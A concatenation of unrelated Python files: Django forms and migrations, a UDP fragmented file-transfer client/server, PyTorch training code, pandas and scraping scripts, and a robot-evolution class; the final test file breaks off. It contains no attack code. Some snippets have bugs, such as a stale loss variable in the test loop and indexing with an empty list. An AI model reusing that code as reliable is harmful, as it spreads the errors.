bcauth_urlpatterns = patterns(
'bcauth.views',
url(r'^accounts/$', 'account', name='account_base'),
url(r'^accounts/profile/$', 'profile', name='account_profile'),
)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2019-04-08 12:37
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('apple', '0005_auto_20190408_1229'),
]
operations = [
migrations.RemoveField(
model_name='appleuser',
name='created_at',
),
]
|
import socket
import struct
import binascii
import random
while True:
role = str(input("server/client? [s/c]: "))
if role == 'c' or role == 's':
break
while True:
reports = input("reports? [y/n]: ")
if reports == 'y' or reports == 'n':
break
if role == 'c':
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
conn = input("connect? [y/n]: ")
address = input("address: ")
port = input("port: ")
try:
serverAddressPort = (address, int(port))
s.sendto(conn.encode("utf-8"), serverAddressPort)
serverAccept = s.recvfrom(1500)
accept = int.from_bytes(serverAccept[0], "little")
except:
accept = 0
#hlavicka prveho packetu
def make_first_header(num_of_packets, fragment_size, checksum):
header = struct.pack('iiL', num_of_packets, fragment_size, checksum)
return header
def make_header(packet_num, check_sum):
header = struct.pack('iL', packet_num, check_sum)
return header
def get_num_of_packets(msg):
n = 0
while msg:
n += 1
msg = msg[buffer_size:]
print(f"num of packets ==== {n}")
return n
def get_num_of_packets_file(file_path):
f = open(file_path, "rb")
file = f.read(buffer_size)
n = 0
while file:
n += 1
file = f.read(buffer_size)
print(f"num of packets ==== {n}")
return n
#vytvori list packetov pri posielani suboru
def make_file_list(file_path):
f = open(file_path, "rb")
file = f.read(buffer_size)
packet_list = []
packet_num = 0
while file:
packet_num += 1
checksum = binascii.crc_hqx(file, 0)
header = make_header(packet_num, checksum)
packet = header + file
packet_list.append(packet)
file = f.read(buffer_size)
f.close()
return packet_list
#vytvori list packetov pri posielani spravy
def make_msg_list(client_msg):
packet_list = []
packet_num = 0
while client_msg:
packet_num += 1
msg = client_msg
msg = msg[:buffer_size]
msg = msg.encode("utf-8")
client_msg = client_msg[buffer_size:]
checksum = binascii.crc_hqx(msg, 0)
header = make_header(packet_num, checksum)
packet = header + msg
packet_list.append(packet)
return packet_list
def send_msg(msg_from_client):
num_of_packets = get_num_of_packets(msg_from_client)
init_msg = "msg".encode("utf-8")
type_checksum = binascii.crc_hqx(init_msg, 0)
first_header = make_first_header(num_of_packets, buffer_size, type_checksum)
while True:
s.sendto(first_header + init_msg, serverAddressPort)
confirm = s.recvfrom(1500)[0].decode("utf-8")
if confirm == "ok":
print("first packet ok!")
break
else:
s.sendto(first_header + init_msg, serverAddressPort)
packet_list = make_msg_list(msg_from_client)
x = 0
y = 10
#pocet desiatok packetov
n = 1
while True:
k = 1
for i in range(x, y):
if i >= num_of_packets:
k = 0
break
s.sendto(packet_list[i], serverAddressPort)
data = s.recvfrom(1500)[0]
feedback = data[4:]
feedback = feedback.decode("utf-8")
header = data[:4]
try:
(failed_pckt,) = struct.unpack("i", header)
except:
break
#ak prisiel chybny packet, tak posle packety od jeho indexu
if feedback == "fail":
print(f"packet no. {failed_pckt} failed!")
for i in range(failed_pckt, y):
s.sendto(packet_list[i], serverAddressPort)
elif feedback == "ok" and reports == 'y':
print(f"{n}. packets received ok!")
#ak niektory packet neprisiel, tak znovu posle vsetkych 10 packetov
elif feedback == '0':
print("some packets did not come!")
for i in range(x, y):
if i >= num_of_packets:
k = 0
break
s.sendto(packet_list[i], serverAddressPort)
#ak sa poslali vsetky packety skonci
if k == 0:
break
x += 10
y += 10
n += 1
return 1
def send_file():
file_path = input("file path: ")
#ziskavam typ suboru
path, file_type = file_path.split('.')
file_type = file_type.encode("utf-8")
print(f"file type == {file_type}")
num_of_packets = get_num_of_packets_file(file_path)
type_checksum = binascii.crc_hqx(file_type, 0)
first_header = make_first_header(num_of_packets, buffer_size, type_checksum)
while True:
s.sendto(first_header + file_type, serverAddressPort)
confirm = s.recvfrom(1500)[0].decode("utf-8")
if confirm == "ok":
print("first packet ok!")
break
else:
s.sendto(first_header + file_type, serverAddressPort)
packet_list = make_file_list(file_path)
#ak chce uzivatel, aby sa poslal chybny packet, tak nastavi nahodne cislo packetu
if packet_fail == 1:
fail = random.randint(0, num_of_packets)
else:
fail = 0
x = 0
y = 10
#pocet desiatok packetov
n = 1
while True:
k = 1
for i in range(x, y):
if i >= num_of_packets:
k = 0
break
#ak sa ma poslat chybny packet, tak poslem len hlavicku, bez fragmentu
if i == fail and packet_fail == 1:
print("sending bad packet")
s.sendto(packet_list[i][:8], serverAddressPort)
else:
s.sendto(packet_list[i], serverAddressPort)
data = s.recvfrom(1500)[0]
feedback = data[4:]
feedback = feedback.decode("utf-8")
header = data[:4]
try:
(failed_pckt,) = struct.unpack("i", header)
except:
break
#ak je niektory packet chybny, tak posle packety od jeho indexu
#tak aby ich dokopy bolo 10 aj s tymi pred nim
if feedback == "fail":
print(f"packet no. {failed_pckt} failed!")
for i in range(failed_pckt, y):
if i >= num_of_packets:
k = 0
break
s.sendto(packet_list[i], serverAddressPort)
elif feedback == "ok" and reports == 'y':
print(f"{n}. packets received ok!")
#ak nejaky packet neprisiel, tak posle vsetky 10 znovu
elif feedback == '0':
print("some packets did not come!")
for i in range(x, y):
if i >= num_of_packets:
k = 0
break
s.sendto(packet_list[i], serverAddressPort)
if k == 0:
break
x += 10
y += 10
n += 1
return 1
#server sa nastavil na pocuvanie a klient moze posielat
if accept == 1:
print("connected...")
print("send msg = m")
print("send file = f")
print("disconnect = d")
while True:
while True:
buffer_size = int(input("size of fragment: "))
# spravna velkost fragmentu musi byt mensia ako 1460
# pretoze hlavicka UDP ma 8 bajtov, ip hlavicka ma 20 a moja ma 12 bajtov
# cize 1500 - 40 = 1460
if buffer_size >= 1460:
print("incorrect buffer size!")
else:
break
# ma sa poslat chybny packet?
packet_fail = int(input("failed packet? [1/0]: "))
user_choice = input("your choice: ")
s.sendto(user_choice.encode("utf-8"), serverAddressPort)
if user_choice == 'm':
msgFromClient = input("your msg: ")
if send_msg(msgFromClient):
print("message sent!")
elif user_choice == 'f':
if send_file():
print("file sent!")
elif user_choice == 'd':
print("disconnected")
break
else:
print("could not connect!")
elif role == 's':
port = int(input("port: "))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))
buffer_size = 1500
def make_feedback_header(wrong_packet):
header = struct.pack("i", int(wrong_packet))
return header
def receive_msg():
while True:
init_data = s.recvfrom(buffer_size)
packet = init_data[0]
type_header = packet[:12]
init_msg = packet[12:]
(num_of_packets, packet_size, checksum) = struct.unpack("iiL", type_header)
check = binascii.crc_hqx(init_msg, 0)
if check == checksum:
print("first packet ok!")
s.sendto("ok".encode("utf-8"), address)
break
else:
continue
msgFromClient = ''
#vytvorim prazdny list, kde pojdu fragmenty
frag_list = []
for i in range(0, num_of_packets):
frag_list.append("")
i = 1
fail = 0
corr = 0
time = 3
failed_pckt = 1
while True:
#nastavujem timeout, keby nahodou niektory packet nedojde
s.settimeout(time)
try:
data = s.recvfrom(buffer_size)
packet = data[0]
header = packet[:8]
(packetNum, checkSum) = struct.unpack("iL", header)
msg = packet[8:]
check = binascii.crc_hqx(msg, 0)
msg = msg.decode("utf-8")
#ak sa checksumy rovnaju packet je ok a da ho do listu
if check == checkSum:
frag_list[packetNum - 1] = msg
if fail == 0:
corr += 1
else:
print("fail!")
if fail == 0:
fail = packetNum
if packetNum == 1 and failed_pckt == 1:
fail = 1
#ak prislo vsetkych 10 packetov ok
if i % 10 == 0 and corr == 10:
header = make_feedback_header(fail)
feedback = header + "ok".encode("utf-8")
s.sendto(feedback, address)
if reports == 'y':
print("packet ok!")
fail = 0
corr = 0
#ak prislo 10 packetov ale aspon jeden je chybny
elif i % 10 == 0 and fail != 0:
print(f"packet no. {fail} failed!")
header = make_feedback_header(fail)
feedback = header + "fail".encode("utf-8")
s.sendto(feedback, address)
i = fail
failed_pckt = 0
fail = 0
#ak prisli vsetky
if packetNum == num_of_packets:
s.sendto("ok".encode("utf-8"), address)
break
i += 1
except:
#ak nepride 10 packetov do troch sekund vypyta si ich znova
print("some packets did not come")
header = make_feedback_header(0)
feedback = header + "0".encode("utf-8")
s.sendto(feedback, address)
i -= 9
corr = 0
time = 3
print("message received!")
for x in frag_list:
msgFromClient += x
print(msgFromClient)
def receiveFile():
while True:
init_data = s.recvfrom(buffer_size)
packet = init_data[0]
type_header = packet[:12]
file_type = packet[12:]
file_name = "file"
file_path = file_name + '.' + file_type.decode("utf-8")
f = open(file_path, 'wb')
(num_of_packets, packet_size, checksum) = struct.unpack("iiL", type_header)
check = binascii.crc_hqx(file_type, 0)
if check == checksum:
print("first packet ok!")
s.sendto("ok".encode("utf-8"), address)
break
else:
continue
# vytvorim prazdny list, kde pojdu fragmenty
frag_list = []
for i in range(0, num_of_packets):
frag_list.append("")
i = 1
fail = 0
corr = 0
time = 3
while True:
# nastavujem timeout, keby nahodou niektory packet nedojde
s.settimeout(time)
try:
data = s.recvfrom(buffer_size)
packet = data[0]
header = packet[:8]
(packetNum, checkSum) = struct.unpack("iL", header)
file = packet[8:]
if reports == 'y':
print(f"{packetNum} / {num_of_packets} packet = {checkSum}")
check = binascii.crc_hqx(file, 0)
# ak sa checksumy rovnaju packet je ok a da ho do listu
if check == checkSum:
frag_list[packetNum - 1] = file
if fail == 0:
corr += 1
else:
if reports == 'y':
print("fail!!!")
if fail == 0:
fail = packetNum
if packetNum == 1:
fail = 1
# ak prislo vsetkych 10 packetov ok
if i % 10 == 0 and corr == 10:
header = make_feedback_header(fail)
feedback = header + "ok".encode("utf-8")
s.sendto(feedback, address)
if reports == 'y':
print("packet ok!")
fail = 0
corr = 0
# ak prislo 10 packetov ale aspon jeden je chybny
elif i % 10 == 0 and fail != 0:
print(f"packet no. {fail} failed!")
header = make_feedback_header(fail)
feedback = header + "fail".encode("utf-8")
s.sendto(feedback, address)
i = fail
fail = 0
if packetNum == num_of_packets:
s.sendto("ok".encode("utf-8"), address)
break
i += 1
except:
# ak nepride 10 packetov do troch sekund vypyta si ich znova
print("some packets did not come")
header = make_feedback_header(0)
feedback = header + "0".encode("utf-8")
s.sendto(feedback, address)
i -= 9
corr = 0
time = 3
print("file received!")
for x in frag_list:
f.write(x)
f.close()
def listen():
print("listening...")
while True:
s.settimeout(40)
try:
clientChoice = s.recvfrom(buffer_size)
choice = clientChoice[0].decode("utf-8")
if choice == 'm':
receive_msg()
elif choice == 'f':
receiveFile()
elif choice == 'd':
print("disconnected...")
break
except:
print("disconnected...")
break
s.settimeout(20)
try:
conn = s.recvfrom(buffer_size)
c = conn[0]
c = c.decode("utf-8")
address = conn[1]
print(c)
print(address)
if c == 'y':
accept = 1
s.sendto(bytes([accept]), address)
listen()
except:
print("no connection") |
# Functions needed for training models
from __future__ import unicode_literals, print_function, division
from io import open
import unicodedata
import string
import re
import random
from random import shuffle
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import numpy as np
import sys
import os
import time
import math
import pickle
from FillerTPE import FillerTPE
use_cuda = torch.cuda.is_available()
def train_TPE(Batch,TPE,TPE_optimizer,criterion):
Sequence_list, Vectors_list=Batch[0],Batch[1]
Vectors_list=torch.tensor(Vectors_list)
TPE_optimizer.zero_grad()
mse_loss,one_hot_loss,l2_norm_loss,unique_filler_loss=0,0,0,0
if isinstance(TPE,FillerTPE):
TPE_output,filler_predictions=TPE(Sequence_list)
batch_one_hot_loss,batch_l2_loss,batch_unique_loss=\
TPE.get_regularization_loss(filler_predictions)
one_hot_loss+=batch_one_hot_loss;l2_norm_loss+=batch_l2_loss;unique_filler_loss+=batch_unique_loss
else:
print('Encoder should be a TPE, given '+str(type(TPE))+'instead!!!')
mse_loss+=criterion(TPE_output,Vectors_list.unsqueeze(0))
loss=mse_loss+one_hot_loss+l2_norm_loss+unique_filler_loss
loss.backward()
TPE_optimizer.step()
return loss.data.item(),mse_loss,one_hot_loss,l2_norm_loss,unique_filler_loss
def bishuffle(bidata):
Sdata,Vdata=bidata[0],bidata[1]
N=len(Sdata)
P=list(range(N))
shuffle(P)
Sdata_S=torch.zeros_like(Sdata)
Vdata_S=torch.zeros_like(Vdata)
for i in range(N):
Sdata_S[i]=Sdata[P[i]]
Vdata_S[i]=Vdata[P[i]]
return [Sdata_S,Vdata_S]
def batchify(data,batch_size):
N=len(data[0])
n_batch=math.ceil(N/batch_size)
batch=[]
for i in range(n_batch):
batch.append([data[0][i*batch_size:(i+1)*batch_size],data[1][i*batch_size:(i+1)*batch_size]])
return batch
def trainIters_TPE(Train_data,Test_data,TPE,n_epochs,
learning_rate=0.001,batch_size=5,patience=3,weight_file=None,
use_one_hot_temperature=True,burn_in=0):
#weight file是模型存储的路径
TPE_optimizer=optim.Adam(TPE.parameters(),lr=learning_rate)
criterion=nn.MSELoss()
pre_loss=1000000
one_hot_temperature=0.0
if use_one_hot_temperature:
one_hot_temperature=1.0
count_epochs_not_improved=0
best_loss=pre_loss
report_text=[]
Embedding_trace=[]
reached_max_temp = False
for epoch in range(n_epochs):
Embedding_trace.append(TPE.filler_assigner.filler_embedding.weight.clone().detach())
print("starting training epoch: "+str(epoch)+'\n')
if burn_in == epoch:
print('Burn in is over, turning on regularization')
if isinstance(TPE, FillerTPE):
TPE.use_regularization(True)
if burn_in == 0:
print('Setting regularization temp to {}'.format(1))
if isinstance(TPE, FillerTPE):
TPE.set_regularization_temp(1)
reached_max_temp = True
if epoch >= burn_in and not reached_max_temp:
temp = float(epoch - burn_in + 1) / burn_in
if temp <= 1:
print('Setting regularization temp to {}'.format(temp))
TPE.set_regularization_temp(temp)
else:
reached_max_temp = True
epoch_loss=0
epoch_mse_loss = 0;epoch_one_hot_loss = 0;epoch_l2_loss = 0;epoch_unique_filler_loss = 0
epoch_Train=bishuffle(Train_data)
batch_Train=batchify(epoch_Train,batch_size)
if isinstance(TPE, FillerTPE):
TPE.train()
for batch in batch_Train:
loss,batch_mse_loss,batch_one_hot_loss,batch_l2_loss,batch_unique_filler_loss=train_TPE(batch,TPE,TPE_optimizer,criterion)
epoch_mse_loss+=batch_mse_loss;epoch_one_hot_loss+=batch_one_hot_loss;epoch_l2_loss+=batch_l2_loss;epoch_unique_filler_loss+=batch_unique_filler_loss
epoch_loss=epoch_mse_loss+epoch_one_hot_loss+epoch_l2_loss+epoch_unique_filler_loss
Num_train_batch=len(batch_Train[0])
epoch_loss/=Num_train_batch;epoch_mse_loss/=Num_train_batch;epoch_one_hot_loss/=Num_train_batch;epoch_l2_loss/=Num_train_batch;epoch_unique_filler_loss/=Num_train_batch
#report training loss
if epoch>=burn_in:
train_report='Average Training Loss is '+str(epoch_loss.item())+' ; '+str(epoch_mse_loss.item())+' ; '+str(epoch_one_hot_loss.item())+' ; '+str(epoch_l2_loss.item())+' ; '+str(epoch_unique_filler_loss.item())+' ; \n'
else:
train_report='Average Training Loss is '+str(epoch_mse_loss.item())+' ; \n'
print(train_report)
report_text.append(train_report)
if isinstance(TPE, FillerTPE):
TPE.eval()
test_loss,test_mse_loss,test_one_hot_loss,test_l2_loss,test_unique_loss=0,0,0,0,0
batch_Test=batchify(Test_data,batch_size)
for batch in batch_Test:
TPE_output, filler_predictions = TPE(batch[0])
batch_one_hot_loss, batch_l2_loss, batch_unique_loss = \
TPE.get_regularization_loss(filler_predictions)
batch_mse_loss = criterion(TPE_output, batch[1].unsqueeze(0))
test_mse_loss+=batch_mse_loss;test_one_hot_loss+=batch_one_hot_loss;test_l2_loss+=batch_l2_loss;test_unique_loss+=batch_unique_filler_loss
test_loss+=batch_mse_loss+batch_one_hot_loss+batch_l2_loss+batch_unique_filler_loss
if reached_max_temp or burn_in == epoch:
if test_loss < best_loss:
print('Saving model at epoch {}'.format(epoch))
count_epochs_not_improved = 0
best_loss = test_loss
torch.save(TPE,weight_file+'TPE.pth')
torch.save(TPE.filler_assigner,weight_file+'assigner.pth')
else:
count_epochs_not_improved += 1
if count_epochs_not_improved == patience:
print('Finished training early')
break
Num_test_batch=len(batch_Test[0])
test_loss/=Num_test_batch;test_mse_loss/=Num_test_batch;test_one_hot_loss/=Num_test_batch;test_l2_loss/=Num_test_batch;test_unique_loss/=Num_test_batch
if epoch>=burn_in:
test_report='Average Test Loss is '+str(test_loss.item())+' ; '+str(test_mse_loss.item())+' ; '+str(test_one_hot_loss.item())+' ; '+str(test_l2_loss.item())+' ; '+str(test_unique_loss.item())+' ; \n\n'
else:
test_report='Average Test Loss is '+str(test_mse_loss.item())+' ; \n'
print(test_report)
report_text.append(test_report)
return Embedding_trace,report_text
def test_TPE(Test_data,TPE,weight_file=None):
if not isinstance(TPE,FillerTPE):
print('Expected model of FillerTPE, Given '+str(type(TPE))+' instead!!!')
else:
Test_Seq,Test_Vec=Test_data[0],Test_data[1]
Test_Vec=torch.tensor(Test_Vec)
TPE.eval()
output,filler_prediction=TPE(Test_Seq)
criterion=nn.MSELoss()
mseloss=criterion(output,Test_Vec)
return mseloss/len(Test_data[0])
|
import numpy as np
import pandas as pd
import os
from io import StringIO
import matplotlib.pyplot as plt
from collections import Counter
cwd = os.getcwd()
print(cwd)
path = "/Users/janmichaelaustria/Documents/Data Sets"
os.chdir(path)
cwd = os.getcwd()
print(cwd)
celebrities = pd.read_csv("celebrity_deaths_4.csv",header=0,encoding = 'unicode_escape')
celebrities.info
#view head of celebrities
celebrities.head(5)
celebrities.columns
columns_to_grab = ['birth_year','death_year']
celebrities_df = celebrities[columns_to_grab]
birth_death_years = celebrities_df.values
min_year = min(birth_death_years[:,0])
max_year = max(birth_death_years[:,1])
list_years = []
for i in range(birth_death_years.shape[0]):
#get life span for the person
life_span = birth_death_years[i,1] - birth_death_years[i,0]
for j in range(life_span):
#get the jth year
j_year = birth_death_years[i,0] + j
#add the year to list_years
list_years.append(j_year)
array_list_years = np.array(list_years)
#get dictionary of counts from array
value_count = Counter(array_list_years)
max_value = max(value_count.values())
max_year_idx = []
max_year = array_list_years[max_year_idx]
for a,b in list(enumerate(value_count.values())):
if b == max_value:
to_index = a
max_year_idx.append(to_index)
plt.hist(array_list_years)
plt.show()
#need to get the year that appears most in this list, and that's the answer
#first create a sorting function to sort the list
def selection_sort(arr):
for eff in range(len(arr)):
switch = eff + np.argmin(arr[eff:])
(arr[eff], arr[switch]) = (arr[switch],arr[eff])
return(arr)
len(list_years)
#need to filter out list of years that are repeated
filtered_list = []
for bah in list_years:
if bah not in filtered_list:
filtered_list.append(bah)
|
# -*- coding: utf-8 -*-
from app.utils import formatting
from formalchemy import FieldSet
from formalchemy.fields import Field
from formalchemy.tables import Grid
import datetime
import operator
def create_generic_date_field(name, attr_getter, dt_format, today_by_default=True):
""" Instanciates a generic date field associated with the format passed as a parameter """
def value(model):
""" Returns the model date or today's date """
default_date = datetime.date.today() if today_by_default else None
dt = model and attr_getter(model) or default_date
return dt and formatting.format_date(dt, dt_format)
return Field(name=name, value=value)
def create_date_field(name, model_date_attribute, dt_format, today_by_default=True):
""" Instanciates a standard date field associated with the format passed as a parameter """
return create_generic_date_field(name, operator.attrgetter(model_date_attribute), dt_format, today_by_default)
class CustomGrid(Grid):
""" Used when simple FormAlchemy grids are not sufficient
(i.e. when the synchronization process should be customized)
A 'post_sync' method, responsible for non-standard synchronization & persistence,
should be defined when inheriting of this class.
"""
def __init__(self, cls, instances):
super(CustomGrid, self).__init__(cls, instances)
def sync_one(self, row):
self._set_active(row)
# Standard synchronization of the fields
for field in self.render_fields.itervalues():
field.sync()
# Customized synchronization & persistence (defined by the child class)
self.post_sync()
class CustomFieldSet(FieldSet):
""" Used when simple FormAlchemy fieldsets are not sufficient
(i.e. when the synchronization process should be customized)
A 'post_sync' method, responsible for non-standard synchronization & persistence,
should be defined when inheriting of this class.
"""
def __init__(self, model):
super(CustomFieldSet, self).__init__(model)
def sync(self):
# Standard synchronization of the fields
for field in self.render_fields.itervalues():
field.sync()
# Customized synchronization & persistence (defined by the child class)
self.post_sync() |
# Generated by Django 2.2.2 on 2019-06-04 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('DBCalls', '0002_auto_20190604_1054'),
]
operations = [
migrations.AlterField(
model_name='collection',
name='colID',
field=models.CharField(max_length=100, primary_key=True, serialize=False),
),
]
|
import random
from sdfbuilder.math import Vector3
from revolve.util import Time
from revolve.angle import Robot as RvRobot
class Robot(RvRobot):
"""
Class to manage a single robot
"""
def __init__(self, conf, name, tree, robot, position, time, battery_level=0.0, parents=None):
"""
:param conf:
:param name:
:param tree:
:param robot: Protobuf robot
:param position:
:type position: Vector3
:param time:
:type time: Time
:param parents:
:type parents: tuple(Robot, Robot)
:param battery_level: Battery charge for this robot
:type battery_level: float
:return:
"""
speed_window = int(conf.evaluation_time * conf.pose_update_frequency)
super(Robot, self).__init__(name=name, tree=tree, robot=robot, position=position, time=time,
battery_level=battery_level, speed_window=speed_window,
warmup_time=conf.warmup_time, parents=parents)
# Set of robots this bot has mated with
self.mated_with = {}
self.last_mate = None
self.conf = conf
self.size = len(tree)
self.battery_level = battery_level
self.initial_charge = battery_level
def will_mate_with(self, other):
"""
Decides whether or not to mate with the other given robot
based on its position and speed.
:param other:
:type other: Robot
:return:
"""
if self.age() < self.conf.warmup_time:
# Don't mate within the warmup time
return False
mate_count = self.mated_with.get(other.name, 0)
if mate_count > self.conf.max_pair_children:
# Maximum number of children with this other parent
# has been reached
return False
if self.last_mate is not None and \
float(self.last_update - self.last_mate) < self.conf.gestation_period:
# Don't mate within the cooldown window
return False
if self.distance_to(other.last_position) > self.conf.mating_distance_threshold:
return False
my_fitness = self.fitness()
other_fitness = other.fitness()
# Only mate with robots with nonzero fitness, check for self zero-fitness
# to prevent division by zero.
return other_fitness > 0 and (
my_fitness == 0 or
(other_fitness / my_fitness) >= self.conf.mating_fitness_threshold
)
def distance_to(self, vec, planar=True):
"""
Calculates the Euclidean distance from this robot to
the given vector position.
:param vec:
:type vec: Vector3
:param planar: If true, only x/y coordinates are considered.
:return:
"""
diff = self.last_position - vec
if planar:
diff.z = 0
return diff.norm()
@staticmethod
def header():
"""
:return:
"""
return ['run', 'id', 't_birth', 'parent1', 'parent2', 'charge', 'nparts', 'x', 'y', 'z']
def write_robot(self, world, details_file, csv_writer):
"""
:param world:
:param details_file:
:param csv_writer:
:return:
"""
with open(details_file, 'w') as f:
f.write(self.robot.SerializeToString())
row = [getattr(world, 'current_run', 0), self.robot.id,
world.age()]
row += [parent.robot.id for parent in self.parents] if self.parents else ['', '']
row += [self.initial_charge, self.size, self.last_position.x,
self.last_position.y, self.last_position.z]
csv_writer.writerow(row)
def fitness(self):
"""
Fitness is proportional to both the displacement and absolute
velocity of the center of mass of the robot, in the formula:
5 dS + S
Where dS is the displacement over a direct line between the
start and end points of the robot, and S is the distance that
the robot has moved.
Since we use an active speed window, we use this formula
in context of velocities instead.
:return:
"""
age = self.age()
if age < (0.25 * self.conf.evaluation_time) or age < self.conf.warmup_time:
# We want at least some data
return 0.0
return 5.0 * self.displacement_velocity() + self.velocity()
def charge(self):
"""
Returns the remaining battery charge of this robot.
:return:
"""
return self.initial_charge - (float(self.age()) * self.size)
def did_mate_with(self, other):
"""
Called when this robot mated with another robot successfully.
:param other:
:type other: Robot
:return:
"""
self.last_mate = self.last_update
if other.name in self.mated_with:
self.mated_with[other.name] += 1
else:
self.mated_with[other.name] = 1
|
import os
from email.mime.image import MIMEImage
from django import forms
from django.conf import settings
from django.contrib.auth import authenticate, get_user_model, login
from django.contrib.auth.forms import PasswordResetForm as DjangoPasswordResetForm
from django.core.mail import EmailMultiAlternatives
from django.template import loader
from django.utils.translation import gettext_lazy as _
from apps.cruncher.forms import CruncherFormRenderer
UserModel = get_user_model()
class UserLoginForm(CruncherFormRenderer):
email = forms.EmailField(
label=_("Votre adresse e-mail"),
required=True,
widget=forms.EmailInput(attrs={"autofocus": True}),
)
password = forms.CharField(
label=_("Mot de passe"),
widget=forms.PasswordInput(),
help_text='<a class="link-text" href="/password-reset/">{}</a>'.format(
_("Perdu votre mot de passe?")
),
)
next = forms.CharField(required=False, widget=forms.HiddenInput())
def clean(self):
email, password = (
self.cleaned_data.get("email"),
self.cleaned_data.get("password"),
)
user = authenticate(request=None, email=email, password=password)
if user is None:
self.add_error("password", _("Adresse e-mail ou mot de passe invalides"))
def login_user(self, request):
assert self.is_bound
email, password = (
self.cleaned_data.get("email"),
self.cleaned_data.get("password"),
)
user = authenticate(request=request, email=email, password=password)
if user.is_active:
login(request, user)
return user
class PasswordResetForm(CruncherFormRenderer, DjangoPasswordResetForm):
email = forms.EmailField(label=_("Votre adresse e-mail"), required=True)
def send_mail(
self,
subject_template_name,
email_template_name,
context,
from_email,
to_email,
html_email_template_name=None,
):
"Send a django.core.mail.EmailMultiAlternatives to `to_email`."
context.update(BASE_URL=settings.BASE_URL)
subject = loader.render_to_string(subject_template_name, context)
# Email subject *must not* contain newlines
subject = "".join(subject.splitlines())
body = loader.render_to_string(email_template_name, context)
email_message = EmailMultiAlternatives(subject, body, from_email, [to_email])
if html_email_template_name is not None:
html_email = loader.render_to_string(html_email_template_name, context)
email_message.attach_alternative(html_email, "text/html")
img = open(
os.path.join(settings.BASE_DIR, "static", "images", "email-logo.png"),
"rb",
).read()
logo_image = MIMEImage(img)
logo_image.add_header("Content-ID", "<email-logo.png>")
logo_image.add_header(
"Content-Disposition", "inline", filename="email-logo.png"
)
logo_image.add_header("Content-Type", "image/png", name="email-logo.png")
email_message.attach(logo_image)
email_message.mixed_subtype = "related"
email_message.send()
def clean_email(self):
email = self.cleaned_data.get("email")
users = UserModel.objects.filter(email=email)
if users.exists():
user = users.first()
if user.is_active and not user.has_usable_password():
raise forms.ValidationError(
_(
"Un utilisateur avec cette adresse e-mail existe, "
"mais aucun mot de passe n'y est associé. Vous êtes-vous "
"inscrits en utilisant un compte Google ou Facebook? "
"Si c'est le cas, veuillez vous re-connecter en utilisant "
"la même méthode!"
)
)
return email
|
import requests
import pandas as pd
# 데이터 포맷팅
pd.options.display.float_format = '{:,.2f}'.format
pd.set_option('mode.chained_assignment', None)
# url: 서버 주소
url = 'http://data.krx.co.kr/comm/bldAttendant/getJsonData.cmd'
# header: 브라우저 정보
headers = {
'User-Agent': 'Mozilla/5.0',
'Origin': 'http://data.krx.co.kr',
'Referer': 'http://data.krx.co.kr/contents/MDC/MDI/mdiLoader/index.cmd?menuId=MDC0201020201',
}
# 종목마스터
data = {
'bld': 'dbms/MDC/STAT/standard/MDCSTAT01901',
'locale': 'ko_KR',
'mktId': 'ALL',
'share': '1',
'csvxls_isNo': 'false',
}
raw = requests.post(url, headers=headers, data=data)
rst = raw.json()['OutBlock_1']
ln = []
for r in rst:
ln.append([c for c in r.values()])
df_master = pd.DataFrame(ln)
df_master.columns = r.keys()
def historical_price(symbol='000660', start_date=None, end_date=None):
# 종목정보 선택
stock = df_master[df_master['ISU_SRT_CD']==symbol]
# 입력인자 세팅
start_date = pd.to_datetime(start_date).strftime('%Y%m%d') if start_date else (pd.Timestamp.today()-pd.DateOffset(days=7)).strftime('%Y%m%d')
end_date = pd.to_datetime(end_date).strftime('%Y%m%d') if end_date else pd.Timestamp.today().strftime('%Y%m%d')
print(start_date, end_date)
data = {
'bld': 'dbms/MDC/STAT/standard/MDCSTAT01701',
'isuCd': '{}'.format(stock['ISU_CD'].iloc[0]),
'strtDd': start_date,
'endDd': end_date,
}
raw = requests.post(url, headers=headers, data=data)
rst = raw.json()['output']
ln = []
for r in rst:
ln.append([c for c in r.values()])
df = pd.DataFrame(ln)
df.columns = r.keys()
df.drop(columns=['FLUC_TP_CD', 'CMPPREVDD_PRC', 'FLUC_RT'], inplace=True)
df.rename(columns={'TRD_DD': 'Date', 'TDD_OPNPRC': 'Open', 'TDD_HGPRC': 'High', 'TDD_LWPRC': 'Low', 'TDD_CLSPRC': 'Close', 'ACC_TRDVOL': 'Volume', 'ACC_TRDVAL': 'Value', 'MKTCAP': 'MarketCap', 'LIST_SHRS': 'Shares', }, inplace=True)
df['Date'] = pd.to_datetime(df['Date'])
df['Open'] = df['Open'].str.replace(',', '').astype(float)
df['High'] = df['High'].str.replace(',', '').astype(float)
df['Low'] = df['Low'].str.replace(',', '').astype(float)
df['Close'] = df['Close'].str.replace(',', '').astype(float)
df['Volume'] = df['Volume'].str.replace(',', '').astype(int)
df['Value'] = df['Value'].str.replace(',', '').astype(float)
df['MarketCap'] = df['MarketCap'].str.replace(',', '').astype(float)
df['Shares'] = df['Shares'].str.replace(',', '').astype(int)
df.set_index('Date', inplace=True)
return df
if __name__ == '__main__':
df = historical_price()
print(df) |
from pathlib import Path
p = (Path(__file__).parent)/ "testingstuff.py"
with open(p) as f:
print(f.readlines())
with p.open() as f:
print(f.readlines()) |
fin=open('outputname.txt','r')
fout=open('outhypo.txt','w')
lines=fin.readlines()
nums='0123456789'
for line in lines:
linechange=line[20:]
if linechange[30]=='\t':
linechange=linechange[0:29]+'0'+linechange[29:]
#line=linechange
if len(linechange)>33:
if linechange[33] not in nums:
#==' ' or linechange[33]=='\t' or linechange[33]=='\n' or linechange[33]=='a' or linechange[33]=='k'
linechange=linechange[0:32]+'0'+linechange[32]+'.000 1.000 000.00 0.00 -999. 0.00 T__D__\n'
else:
linechange=linechange[:34]+'.000 1.000 000.00 0.00 -999. 0.00 T__D__\n'
else:
linechange=linechange[0:32]+'0'+linechange[32]+'.000 1.000 000.00 0.00 -999. 0.00 T__D__\n'
fout.write(linechange)
fin.close()
fout.close()
|
from django.test import TestCase
from django.utils.html import escape
from lists.models import Item, List
from lists.forms import (
DUPLICATE_ITEM_ERROR, EMPTY_ITEM_ERROR,
ExistingListItemForm, ItemForm,
)
# Create your tests here.
class HomePageTest(TestCase):
"""Home page test"""
def test_uses_home_template(self):
"""test: using Home template"""
